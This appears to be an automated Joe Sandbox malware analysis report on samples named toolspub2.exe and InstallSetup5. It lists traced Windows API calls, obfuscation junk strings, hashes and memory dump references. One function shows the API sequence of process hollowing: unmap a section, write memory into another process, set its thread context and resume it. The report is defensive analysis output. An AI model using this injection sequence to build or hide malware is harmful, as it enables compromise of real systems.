Associated: 00000002.00000002.4559551876.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4562411174.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4562560149.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4562560149.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4562560149.0000000000431000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4562560149.0000000000440000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4565248612.0000000000445000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4565248612.0000000000447000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4565248612.0000000000465000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4565248612.0000000000485000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_InstallSetup5.jbxd

Similarity

API ID: lstrlen$CharNextlstrcmpi
String ID:
API String ID: 190613189-0
Opcode ID: 2e04212541fd7d2d0fc4f715182178ccf0de62a07a1c27cf83518a5c6c9cf375
Instruction ID: e9567a821587a5f0376c4e2be66d4cfc8c6f540c5076303c4651ac02cb4e93c6
Opcode Fuzzy Hash: 2e04212541fd7d2d0fc4f715182178ccf0de62a07a1c27cf83518a5c6c9cf375
Instruction Fuzzy Hash: E1F09631105519FFC7029FA5DE00D9FBBA8EF05350B2540B9F840F7250D678DE01AB69

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: toolspub2.exePID: 2012, Parent PID: 5776COMMON

Execution Graph

Execution Coverage:	9.4%
Dynamic/Decrypted Code Coverage:	3.5%
Signature Coverage:	8.5%
Total number of Nodes:	1114
Total number of Limit Nodes:	30

Executed Functions

Function 00429C40 Relevance: 329.8, APIs: 150, Strings: 38, Instructions: 792
threadstringtimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CharToOemBuffA.USER32(00000000,00000000,00000000), ref: 00429C6D
AddConsoleAliasW.KERNEL32(00000000,00000000,00000000,1FF896F3,7694FB30,?,?,m~W ,0042B9B7,4CC2D44F,7B4F1FF6,32029781,5267C93B,7E719729,549BF258,78004678), ref: 00429C7E
GetAltTabInfoA.USER32(00000000,00000000,00000000,00000000,00000000,1FF896F3,7694FB30,?,?,m~W ,0042B9B7,4CC2D44F,7B4F1FF6,32029781,5267C93B,7E719729), ref: 00429CBF
DrawCaption.USER32(00000000,00000000,00000000,00000000), ref: 00429CC9
WinHttpGetProxyForUrl.WINHTTP(00000000,zitecihucepikigibecit,00000000,684C9EF0,?,?,m~W ,0042B9B7,4CC2D44F,7B4F1FF6,32029781,5267C93B,7E719729,549BF258,78004678,12D1A763), ref: 00429CDB
SetThreadContext.KERNEL32(00000000,00000000,?,?,m~W ,0042B9B7,4CC2D44F,7B4F1FF6,32029781,5267C93B,7E719729,549BF258,78004678,12D1A763,1ED99A87,38EE1569), ref: 00429CEC
GetFileAttributesExA.KERNEL32(fowigesu lonemofalahez yeyinizesorazepa cazohopegopipoc,00000000,?,?,?,m~W ,0042B9B7,4CC2D44F,7B4F1FF6,32029781,5267C93B,7E719729,549BF258,78004678,12D1A763,1ED99A87), ref: 00429D00
DragAcceptFiles.SHELL32(00000000,00000000), ref: 00429D08
CoGetInstanceFromFile.OLE32(00000000,00000000,00000000,00000000,00000000,00000000,3F7F80AC,00000000,?,?,m~W ,0042B9B7,4CC2D44F,7B4F1FF6,32029781,5267C93B), ref: 00429D1A
__putw.LIBCMT ref: 00429D32
GetConsoleAliasesLengthW.KERNEL32(00000000,1FF896F3,7694FB30,?,?,m~W ,0042B9B7,4CC2D44F,7B4F1FF6,32029781,5267C93B,7E719729,549BF258,78004678,12D1A763,1ED99A87), ref: 00429D82
WriteConsoleOutputCharacterA.KERNEL32(00000000,rigiwudocigilopecopisotojohomi,00000000,00000000,3F7F80AC,?,?,m~W ,0042B9B7,4CC2D44F,7B4F1FF6,32029781,5267C93B,7E719729,549BF258,78004678), ref: 00429D97
EnumDateFormatsExW.KERNEL32(00000000,00000000,00000000,?,?,m~W ,0042B9B7,4CC2D44F,7B4F1FF6,32029781,5267C93B,7E719729,549BF258,78004678,12D1A763,1ED99A87), ref: 00429D9C
FindNextVolumeMountPointA.KERNEL32(?,00000000,00000000), ref: 00429DA8
GlobalAlloc.KERNELBASE(00000000,?,1FF896F3,7694FB30,?,?,m~W ,0042B9B7,4CC2D44F,7B4F1FF6,32029781,5267C93B,7E719729,549BF258,78004678,12D1A763), ref: 00429DC6
GetWindowsDirectoryW.KERNEL32(?,00000000,?,?,m~W ,0042B9B7,4CC2D44F,7B4F1FF6,32029781,5267C93B,7E719729,549BF258,78004678,12D1A763,1ED99A87,38EE1569), ref: 00429E00
SetThreadIdealProcessor.KERNEL32(00000000,00000000,?,?,m~W ,0042B9B7,4CC2D44F,7B4F1FF6,32029781,5267C93B,7E719729,549BF258,78004678,12D1A763,1ED99A87,38EE1569), ref: 00429E04
ReadConsoleOutputCharacterW.KERNEL32(00000000,?,00000000,00000000,3F7F80AC,?,?,m~W ,0042B9B7,4CC2D44F,7B4F1FF6,32029781,5267C93B,7E719729,549BF258,78004678), ref: 00429E1C
FatalAppExitW.KERNEL32(00000000,00000000,?,?,m~W ,0042B9B7,4CC2D44F,7B4F1FF6,32029781,5267C93B,7E719729,549BF258,78004678,12D1A763,1ED99A87,38EE1569), ref: 00429E24
BuildCommDCBAndTimeoutsA.KERNEL32(zepodasa,07780C44,684C9EF0), ref: 00429E4F
GetVolumeInformationW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,m~W ,0042B9B7,4CC2D44F,7B4F1FF6,32029781,5267C93B), ref: 00429E6C
GetConsoleAliasA.KERNEL32(00000000,?,00000000,00000000,?,?,m~W ,0042B9B7,4CC2D44F,7B4F1FF6,32029781,5267C93B,7E719729,549BF258,78004678,12D1A763), ref: 00429E7D
SetProcessShutdownParameters.KERNEL32(00000000,00000000,?,?,m~W ,0042B9B7,4CC2D44F,7B4F1FF6,32029781,5267C93B,7E719729,549BF258,78004678,12D1A763,1ED99A87,38EE1569), ref: 00429E85
SetConsoleCP.KERNEL32(00000000,?,?,m~W ,0042B9B7,4CC2D44F,7B4F1FF6,32029781,5267C93B,7E719729,549BF258,78004678,12D1A763,1ED99A87,38EE1569,5EBC0077), ref: 00429EA3
FindAtomW.KERNEL32(00000000), ref: 00429EAA
GetTempPathA.KERNEL32(00000000,?,?,?,m~W ,0042B9B7,4CC2D44F,7B4F1FF6,32029781,5267C93B,7E719729,549BF258,78004678,12D1A763,1ED99A87,38EE1569), ref: 00429EB9
CompareStringA.KERNEL32(00000000,00000000,00000000,00000000,vekemepozub,00000000,?,?,m~W ,0042B9B7,4CC2D44F,7B4F1FF6,32029781,5267C93B,7E719729,549BF258), ref: 00429EC9
GetCurrentDirectoryW.KERNEL32(00000000,?,?,?,m~W ,0042B9B7,4CC2D44F,7B4F1FF6,32029781,5267C93B,7E719729,549BF258,78004678,12D1A763,1ED99A87,38EE1569), ref: 00429ED8
lstrlenW.KERNEL32(00000000,?,?,m~W ,0042B9B7,4CC2D44F,7B4F1FF6,32029781,5267C93B,7E719729,549BF258,78004678,12D1A763,1ED99A87,38EE1569,5EBC0077), ref: 00429EDF
GetLocaleInfoW.KERNEL32(00000000,00000000,?,00000000,?,?,m~W ,0042B9B7,4CC2D44F,7B4F1FF6,32029781,5267C93B,7E719729,549BF258,78004678,12D1A763), ref: 00429EF0
GetCommConfig.KERNEL32(00000000,00000000,00000000,?,?,m~W ,0042B9B7,4CC2D44F,7B4F1FF6,32029781,5267C93B,7E719729,549BF258,78004678,12D1A763,1ED99A87), ref: 00429EF9
CancelIo.KERNEL32(00000000,?,?,m~W ,0042B9B7,4CC2D44F,7B4F1FF6,32029781,5267C93B,7E719729,549BF258,78004678,12D1A763,1ED99A87,38EE1569,5EBC0077), ref: 00429F00
_hread.KERNEL32(00000000,?,00000000), ref: 00429F10
CreateHardLinkA.KERNEL32(mujuxalalohigosafemeduwixi,susejitiy,00000000,?,?,m~W ,0042B9B7,4CC2D44F,7B4F1FF6,32029781,5267C93B,7E719729,549BF258,78004678,12D1A763,1ED99A87), ref: 00429F21
ConvertFiberToThread.KERNEL32(?,?,m~W ,0042B9B7,4CC2D44F,7B4F1FF6,32029781,5267C93B,7E719729,549BF258,78004678,12D1A763,1ED99A87,38EE1569,5EBC0077,6D5D0E80), ref: 00429F27
DeleteVolumeMountPointA.KERNEL32(yotasal), ref: 00429F32
EnumSystemCodePagesA.KERNEL32(00000000,00000000), ref: 00429F3A
GetEnvironmentStringsW.KERNEL32(?,?,m~W ,0042B9B7,4CC2D44F,7B4F1FF6,32029781,5267C93B,7E719729,549BF258,78004678,12D1A763,1ED99A87,38EE1569,5EBC0077,6D5D0E80), ref: 00429F40
InterlockedIncrement.KERNEL32(3F7F80AC), ref: 00429F4B
InterlockedDecrement.KERNEL32(5EBC0077), ref: 00429F56
GetProcessVersion.KERNEL32(00000000,?,?,m~W ,0042B9B7,4CC2D44F,7B4F1FF6,32029781,5267C93B,7E719729,549BF258,78004678,12D1A763,1ED99A87,38EE1569,5EBC0077), ref: 00429F5D
SetLocaleInfoA.KERNEL32(00000000,00000000,00000000), ref: 00429F66
_hread.KERNEL32(00000000,00000000,00000000), ref: 00429F75
_hread.KERNEL32(00000000,00000000,00000000), ref: 00429F7A
ReadConsoleInputW.KERNEL32(00000000,6D5D0E80,00000000,0766FE46,?,?,m~W ,0042B9B7,4CC2D44F,7B4F1FF6,32029781,5267C93B,7E719729,549BF258,78004678,12D1A763), ref: 00429F88
GetPrivateProfileIntW.KERNEL32(00000000,00000000,00000000,00000000), ref: 00429F92
GetConsoleAliasExesA.KERNEL32(00000000,00000000,?,?,m~W ,0042B9B7,4CC2D44F,7B4F1FF6,32029781,5267C93B,7E719729,549BF258,78004678,12D1A763,1ED99A87,38EE1569), ref: 00429F9A
OpenJobObjectA.KERNEL32(00000000,00000000,siyitixupilidategisufit), ref: 00429FA7
SetTapeParameters.KERNEL32(00000000,00000000,2B0ACA95), ref: 00429FB4
CreateNamedPipeW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,m~W ,0042B9B7,4CC2D44F,7B4F1FF6,32029781,5267C93B), ref: 00429FC2
BuildCommDCBAndTimeoutsW.KERNEL32(cafepusij kodugamuravivo tovizefotulugohuduzukilehisama,549BF258,684C9EF0), ref: 00429FED
VerSetConditionMask.KERNEL32(00000000,00000000,00000000,00000000,?,?,m~W ,0042B9B7,4CC2D44F,7B4F1FF6,32029781,5267C93B,7E719729,549BF258,78004678,12D1A763), ref: 00429FF7
GetCurrencyFormatW.KERNEL32(00000000,00000000,00000000,00000000,?,00000000), ref: 0042A00A
lstrcpyA.KERNEL32(?,Nux pirisumapiso,?,?,m~W ,0042B9B7,4CC2D44F,7B4F1FF6,32029781,5267C93B,7E719729,549BF258,78004678,12D1A763,1ED99A87,38EE1569), ref: 0042A01D
ExitProcess.KERNEL32 ref: 0042A024

Strings

zitecihucepikigibecit, xrefs: 00429CD5
fuwexorovuvividenev soyavewisiyunawibehiyaj hanuvimahanolitoneyuy suwopijow, xrefs: 0042A049
wasop rojuxiw xaniloyaresozoburu ziviwu xaninemipajajogecuhurodeperino, xrefs: 0042A132
kolewaxelufamakasukocenorabumoji, xrefs: 0042A5DD
henanuzu genucubec, xrefs: 0042A239
Maw livuhubesavidepepufufado, xrefs: 0042A0F7
yinasefabode, xrefs: 0042A07C
bulomiyonazewapolasokinohiyemuw nor, xrefs: 0042A5E8
Rewayete perob vurarih cases zebutakizuvudij, xrefs: 0042A640
zuwumoxucironevaxuy, xrefs: 0042A0C7
bajebumiravovopayoc doxocipeviwuduzucorigi, xrefs: 0042A189
vekemepozub, xrefs: 00429EC0
zepodasa, xrefs: 00429E36
kasujizevohowifeluwadovijafoh, xrefs: 0042A616
becefepetewidobotu, xrefs: 0042A259
fowigesu lonemofalahez yeyinizesorazepa cazohopegopipoc, xrefs: 00429CFB
vawixinadokitu jevukayisodomekofitoyojaj lederiwacugegerizexemafeyoy, xrefs: 0042A0F2
Nux pirisumapiso, xrefs: 0042A010
dogocopanisewejipikexetocu xolojaxuzaxoriwe, xrefs: 0042A3AC
siyitixupilidategisufit, xrefs: 00429FA0
kucevukanic datosijacumedogoko buy lovud wafizonajexevu, xrefs: 0042A26C
rigiwudocigilopecopisotojohomi, xrefs: 00429D8D
lotoboxicevexolayuzegovivusoy, xrefs: 0042A571
hos, xrefs: 0042A102
cafepusij kodugamuravivo tovizefotulugohuduzukilehisama, xrefs: 00429FD4
kotiremapaniveza hehuje faf, xrefs: 0042A321
m~W , xrefs: 00429C40
facomimimutesotuvij xeluzetako, xrefs: 0042A279
wazamugepojizevelede hatusorotoputanefiguketob, xrefs: 0042A12D
xicihucujihatiwomihazuy wusucehadebiwevizeroxoxelivu, xrefs: 0042A057
juyelixaketulipir kubamafanoli roxikelupohuwupim sosizepawehilixirivohevufo, xrefs: 0042A0CF
rawuxatofini dezedofuxucejowive, xrefs: 0042A061
xumewukageholehi, xrefs: 0042A215
gumanuwamopeborikocujobu talabojecuda fojirafepogafibujuyos tovagiwejirenawudivulipo dolikimenucipitagisato, xrefs: 0042A05C
mujuxalalohigosafemeduwixi, xrefs: 00429F1C
lacojaganomunuweniyob, xrefs: 0042A1FE
yotasal, xrefs: 00429F2D
susejitiy, xrefs: 00429F17

Memory Dump Source

Source File: 00000003.00000002.2152997322.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2152847235.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2153285719.000000000042F000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2153441674.0000000000430000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2153589633.0000000000433000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2153832865.00000000007BB000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_toolspub2.jbxd

Similarity

API ID: Console$AliasCommInfoProcessThreadVolume_hread$BuildCharacterCreateDirectoryEnumExitFileFindInterlockedLocaleMountOutputParametersPointReadTimeouts$AcceptAliasesAllocAtomAttributesBuffCancelCaptionCharCodeCompareConditionConfigContextConvertCurrencyCurrentDateDecrementDeleteDragDrawEnvironmentExesFatalFiberFilesFormatFormatsFromGlobalHardHttpIdealIncrementInformationInputInstanceLengthLinkMaskNamedNextObjectOpenPagesPathPipePrivateProcessorProfileProxyShutdownStringStringsSystemTapeTempVersionWindowsWrite__putwlstrcpylstrlen
String ID: Maw livuhubesavidepepufufado$Nux pirisumapiso$Rewayete perob vurarih cases zebutakizuvudij$bajebumiravovopayoc doxocipeviwuduzucorigi$becefepetewidobotu$bulomiyonazewapolasokinohiyemuw nor$cafepusij kodugamuravivo tovizefotulugohuduzukilehisama$dogocopanisewejipikexetocu xolojaxuzaxoriwe$facomimimutesotuvij xeluzetako$fowigesu lonemofalahez yeyinizesorazepa cazohopegopipoc$fuwexorovuvividenev soyavewisiyunawibehiyaj hanuvimahanolitoneyuy suwopijow$gumanuwamopeborikocujobu talabojecuda fojirafepogafibujuyos tovagiwejirenawudivulipo dolikimenucipitagisato$henanuzu genucubec$hos$juyelixaketulipir kubamafanoli roxikelupohuwupim sosizepawehilixirivohevufo$kasujizevohowifeluwadovijafoh$kolewaxelufamakasukocenorabumoji$kotiremapaniveza hehuje faf$kucevukanic datosijacumedogoko buy lovud wafizonajexevu$lacojaganomunuweniyob$lotoboxicevexolayuzegovivusoy$mujuxalalohigosafemeduwixi$m~W $rawuxatofini dezedofuxucejowive$rigiwudocigilopecopisotojohomi$siyitixupilidategisufit$susejitiy$vawixinadokitu jevukayisodomekofitoyojaj lederiwacugegerizexemafeyoy$vekemepozub$wasop rojuxiw xaniloyaresozoburu ziviwu xaninemipajajogecuhurodeperino$wazamugepojizevelede hatusorotoputanefiguketob$xicihucujihatiwomihazuy wusucehadebiwevizeroxoxelivu$xumewukageholehi$yinasefabode$yotasal$zepodasa$zitecihucepikigibecit$zuwumoxucironevaxuy
API String ID: 3937935734-882632078
Opcode ID: 892c94be4f6526847a0e7f5b2944e4a03e408c49b1e326f98f39eee5aaace2ed
Instruction ID: d50f5054499fc35c18551cf594888c1d2b92a9efd51e71263a81381d60eec7bd
Opcode Fuzzy Hash: 892c94be4f6526847a0e7f5b2944e4a03e408c49b1e326f98f39eee5aaace2ed
Instruction Fuzzy Hash: 994220F1504344AFE314AFB0EEC8DAB77ACEB88345F405929F646A2171DA789C44CB79

Uniqueness

Uniqueness Score: -1.00%

Function 0042A378 Relevance: 82.5, APIs: 41, Strings: 6, Instructions: 202
timelibraryfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

InterlockedIncrement.KERNEL32(0705214E), ref: 0042A391
GetCharWidthFloatA.GDI32(00000000,00000000,00000000,00000000,?,?,m~W ,0042B9B7,4CC2D44F,7B4F1FF6,32029781,5267C93B,7E719729,549BF258,78004678,12D1A763), ref: 0042A397
ClearEventLogA.ADVAPI32(00000000,00000000), ref: 0042A39B
GlobalUnfix.KERNEL32(78004678), ref: 0042A3A6
OpenWaitableTimerA.KERNEL32(00000000,00000000,dogocopanisewejipikexetocu xolojaxuzaxoriwe), ref: 0042A3B3
GlobalFlags.KERNEL32(00000000), ref: 0042A3BA
LocalFlags.KERNEL32(00000000), ref: 0042A3C1
GetDlgCtrlID.USER32(00000000), ref: 0042A40D
DebugActiveProcess.KERNEL32(00000000,?,?,m~W ,0042B9B7,4CC2D44F,7B4F1FF6,32029781,5267C93B,7E719729,549BF258,78004678,12D1A763,1ED99A87,38EE1569,5EBC0077), ref: 0042A410
WritePrivateProfileSectionW.KERNEL32(00000000,00000000,00000000), ref: 0042A415
SleepEx.KERNEL32(00000000,00000000,?,?,m~W ,0042B9B7,4CC2D44F,7B4F1FF6,32029781,5267C93B,7E719729,549BF258,78004678,12D1A763,1ED99A87,38EE1569), ref: 0042A41D
GetUserDefaultLangID.KERNEL32(?,?,m~W ,0042B9B7,4CC2D44F,7B4F1FF6,32029781,5267C93B,7E719729,549BF258,78004678,12D1A763,1ED99A87,38EE1569,5EBC0077,6D5D0E80), ref: 0042A423
_llseek.KERNEL32(00000000,00000000,00000000), ref: 0042A42C
GlobalUnlock.KERNEL32(00000000,?,?,m~W ,0042B9B7,4CC2D44F,7B4F1FF6,32029781,5267C93B,7E719729,549BF258,78004678,12D1A763,1ED99A87,38EE1569,5EBC0077), ref: 0042A42F
InitiateSystemShutdownA.ADVAPI32(00000000,00000000,00000000,00000000,00000000), ref: 0042A43A
AbortSystemShutdownW.ADVAPI32(00000000), ref: 0042A441
WinHttpReadData.WINHTTP(00000000,00000000,00000000,00000000,?,?,m~W ,0042B9B7,4CC2D44F,7B4F1FF6,32029781,5267C93B,7E719729,549BF258,78004678,12D1A763), ref: 0042A44B
WinHttpOpen.WINHTTP(00000000,00000000,00000000,00000000,00000000,?,?,m~W ,0042B9B7,4CC2D44F,7B4F1FF6,32029781,5267C93B,7E719729,549BF258,78004678), ref: 0042A456
WinHttpWriteData.WINHTTP(00000000,00000000,00000000,00000000,?,?,m~W ,0042B9B7,4CC2D44F,7B4F1FF6,32029781,5267C93B,7E719729,549BF258,78004678,12D1A763), ref: 0042A460
RevertToSelf.ADVAPI32(?,?,m~W ,0042B9B7,4CC2D44F,7B4F1FF6,32029781,5267C93B,7E719729,549BF258,78004678,12D1A763,1ED99A87,38EE1569,5EBC0077,6D5D0E80), ref: 0042A466
LoadLibraryW.KERNELBASE(007B8830,?,?,m~W ,0042B9B7,4CC2D44F,7B4F1FF6,32029781,5267C93B,7E719729,549BF258,78004678,12D1A763,1ED99A87,38EE1569,5EBC0077), ref: 0042A4CB
GetConsoleCursorInfo.KERNEL32(00000000,0705214E,?,?,m~W ,0042B9B7,4CC2D44F,7B4F1FF6,32029781,5267C93B,7E719729,549BF258,78004678,12D1A763,1ED99A87,38EE1569), ref: 0042A555
GetConsoleOutputCP.KERNEL32(?,?,m~W ,0042B9B7,4CC2D44F,7B4F1FF6,32029781,5267C93B,7E719729,549BF258,78004678,12D1A763,1ED99A87,38EE1569,5EBC0077,6D5D0E80), ref: 0042A55B
TerminateProcess.KERNEL32(00000000,00000000,?,?,m~W ,0042B9B7,4CC2D44F,7B4F1FF6,32029781,5267C93B,7E719729,549BF258,78004678,12D1A763,1ED99A87,38EE1569), ref: 0042A563
FindFirstFileW.KERNEL32(lotoboxicevexolayuzegovivusoy,?,?,?,m~W ,0042B9B7,4CC2D44F,7B4F1FF6,32029781,5267C93B,7E719729,549BF258,78004678,12D1A763,1ED99A87,38EE1569), ref: 0042A576
InterlockedDecrement.KERNEL32(0705214E), ref: 0042A581
GetModuleHandleW.KERNEL32(00000000,?,?,m~W ,0042B9B7,4CC2D44F,7B4F1FF6,32029781,5267C93B,7E719729,549BF258,78004678,12D1A763,1ED99A87,38EE1569,5EBC0077), ref: 0042A588
CreateActCtxW.KERNEL32(00000000,?,?,m~W ,0042B9B7,4CC2D44F,7B4F1FF6,32029781,5267C93B,7E719729,549BF258,78004678,12D1A763,1ED99A87,38EE1569,5EBC0077), ref: 0042A58F
_lclose.KERNEL32(00000000), ref: 0042A596
ReadConsoleW.KERNEL32(00000000,?,00000000,2FDEAD79,00000000,?,?,m~W ,0042B9B7,4CC2D44F,7B4F1FF6,32029781,5267C93B,7E719729,549BF258,78004678), ref: 0042A5AC
GetNamedPipeHandleStateW.KERNEL32(00000000,73C5D315,2B0ACA95,460D02EE,3AFB68FE,?,00000000,?,?,m~W ,0042B9B7,4CC2D44F,7B4F1FF6,32029781,5267C93B,7E719729), ref: 0042A5D0
GlobalFindAtomW.KERNEL32(00000000), ref: 0042A5D7
lstrlenA.KERNEL32(kolewaxelufamakasukocenorabumoji,?,?,m~W ,0042B9B7,4CC2D44F,7B4F1FF6,32029781,5267C93B,7E719729,549BF258,78004678,12D1A763,1ED99A87,38EE1569,5EBC0077), ref: 0042A5E2
GetModuleHandleA.KERNEL32(bulomiyonazewapolasokinohiyemuw nor,?,?,m~W ,0042B9B7,4CC2D44F,7B4F1FF6,32029781,5267C93B,7E719729,549BF258,78004678,12D1A763,1ED99A87,38EE1569,5EBC0077), ref: 0042A5ED
VerLanguageNameW.KERNEL32(00000000,?,00000000,?,?,m~W ,0042B9B7,4CC2D44F,7B4F1FF6,32029781,5267C93B,7E719729,549BF258,78004678,12D1A763,1ED99A87), ref: 0042A5FD
CreateEventW.KERNEL32(00000000,00000000,00000000,00000000,?,?,m~W ,0042B9B7,4CC2D44F,7B4F1FF6,32029781,5267C93B,7E719729,549BF258,78004678,12D1A763), ref: 0042A607
ExpandEnvironmentStringsA.KERNEL32(kasujizevohowifeluwadovijafoh,?,00000000,?,?,m~W ,0042B9B7,4CC2D44F,7B4F1FF6,32029781,5267C93B,7E719729,549BF258,78004678,12D1A763,1ED99A87), ref: 0042A61B
GetProcessAffinityMask.KERNEL32(00000000,00000000,00000000), ref: 0042A624
SetTimeZoneInformation.KERNEL32(?,?,?,m~W ,0042B9B7,4CC2D44F,7B4F1FF6,32029781,5267C93B,7E719729,549BF258,78004678,12D1A763,1ED99A87,38EE1569,5EBC0077), ref: 0042A632
ActivateActCtx.KERNEL32(00000000,00000000,?,?,m~W ,0042B9B7,4CC2D44F,7B4F1FF6,32029781,5267C93B,7E719729,549BF258,78004678,12D1A763,1ED99A87,38EE1569), ref: 0042A63A
DeleteVolumeMountPointA.KERNEL32(Rewayete perob vurarih cases zebutakizuvudij), ref: 0042A645

Strings

bulomiyonazewapolasokinohiyemuw nor, xrefs: 0042A5E8
Rewayete perob vurarih cases zebutakizuvudij, xrefs: 0042A640
kasujizevohowifeluwadovijafoh, xrefs: 0042A616
kolewaxelufamakasukocenorabumoji, xrefs: 0042A5DD
dogocopanisewejipikexetocu xolojaxuzaxoriwe, xrefs: 0042A3AC
lotoboxicevexolayuzegovivusoy, xrefs: 0042A571

Memory Dump Source

Source File: 00000003.00000002.2152997322.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2152847235.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2153285719.000000000042F000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2153441674.0000000000430000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2153589633.0000000000433000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2153832865.00000000007BB000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_toolspub2.jbxd

Similarity

API ID: Global$ConsoleHandleHttpProcess$CreateDataEventFindFlagsInterlockedModuleOpenReadShutdownSystemWrite$AbortActivateActiveAffinityAtomCharClearCtrlCursorDebugDecrementDefaultDeleteEnvironmentExpandFileFirstFloatIncrementInfoInformationInitiateLangLanguageLibraryLoadLocalMaskMountNameNamedOutputPipePointPrivateProfileRevertSectionSelfSleepStateStringsTerminateTimeTimerUnfixUnlockUserVolumeWaitableWidthZone_lclose_llseeklstrlen
String ID: Rewayete perob vurarih cases zebutakizuvudij$bulomiyonazewapolasokinohiyemuw nor$dogocopanisewejipikexetocu xolojaxuzaxoriwe$kasujizevohowifeluwadovijafoh$kolewaxelufamakasukocenorabumoji$lotoboxicevexolayuzegovivusoy
API String ID: 679312455-3953531779
Opcode ID: 3a48f9abfdcf7132f2051365ae9c73d24e08ba9f00dbc9a366e3cb540e71a8ae
Instruction ID: edf7171a028adfb4a70e067252a9153ff2f49692f783330aac89689947b74cda
Opcode Fuzzy Hash: 3a48f9abfdcf7132f2051365ae9c73d24e08ba9f00dbc9a366e3cb540e71a8ae
Instruction Fuzzy Hash: 436133B1114244EFE304AFB0EEC8E6B37ADFB48345F449929F64696171DB798844CB3A

Uniqueness

Uniqueness Score: -1.00%

Function 00830110 Relevance: 22.7, APIs: 15, Instructions: 248
memorynativethreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE(00000000,00002800,00001000,00000004), ref: 00830156
GetModuleFileNameA.KERNELBASE(00000000,?,00002800), ref: 0083016C
CreateProcessA.KERNELBASE(?,00000000), ref: 00830255
VirtualFree.KERNELBASE(?,00000000,00008000), ref: 00830270
VirtualAlloc.KERNELBASE(00000000,00000004,00001000,00000004), ref: 00830283
Wow64GetThreadContext.KERNEL32(00000000,?), ref: 0083029F
ReadProcessMemory.KERNELBASE(00000000,?,?,00000004,00000000), ref: 008302C8
NtUnmapViewOfSection.NTDLL(00000000,?), ref: 008302E3
VirtualAllocEx.KERNELBASE(00000000,?,?,00003000,00000040), ref: 00830304
NtWriteVirtualMemory.NTDLL(00000000,?,?,00000000,00000000), ref: 0083032A
NtWriteVirtualMemory.NTDLL(00000000,00000000,?,00000002,00000000), ref: 00830399
WriteProcessMemory.KERNELBASE(00000000,?,?,00000004,00000000), ref: 008303BF
Wow64SetThreadContext.KERNEL32(00000000,?), ref: 008303E1
ResumeThread.KERNELBASE(00000000), ref: 008303ED
ExitProcess.KERNEL32(00000000), ref: 00830412

Memory Dump Source

Source File: 00000003.00000002.2154338530.0000000000830000.00000040.00001000.00020000.00000000.sdmp, Offset: 00830000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_830000_toolspub2.jbxd

Similarity

API ID: Virtual$MemoryProcess$AllocThreadWrite$ContextWow64$CreateExitFileFreeModuleNameReadResumeSectionUnmapView
String ID:
API String ID: 93872480-0
Opcode ID: ec80134effe49fee59cfb16798ca45a1398515b3278bf894a8b0bf22fdce02bc
Instruction ID: 3a2e802ed73c16134e1daee72bc1c7d129dd60ad639d9c1231866f9388b61e95
Opcode Fuzzy Hash: ec80134effe49fee59cfb16798ca45a1398515b3278bf894a8b0bf22fdce02bc
Instruction Fuzzy Hash: 06B1C874A00208AFDB44CF98C895F9EBBB5FF88314F248158E509AB391D771AE41CF94

Uniqueness

Uniqueness Score: -1.00%

Function 00958404 Relevance: 3.0, APIs: 2, Instructions: 41
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 0095842C
Module32First.KERNEL32(00000000,00000224), ref: 0095844C

Memory Dump Source

Source File: 00000003.00000002.2155575698.0000000000952000.00000040.00000020.00020000.00000000.sdmp, Offset: 00952000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_952000_toolspub2.jbxd

Yara matches

Similarity

API ID: CreateFirstModule32SnapshotToolhelp32
String ID:
API String ID: 3833638111-0
Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
Instruction ID: cc9d42787af4ce532fc5227a6bb52c1f8d481d421c72f05562b50ca626b53710
Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
Instruction Fuzzy Hash: 7CF062312007126BD720BFBA988DB6F76ECAF49726F100528EE42A10D0DF70E8494B61

Uniqueness

Uniqueness Score: -1.00%

Function 00830420 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 113
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

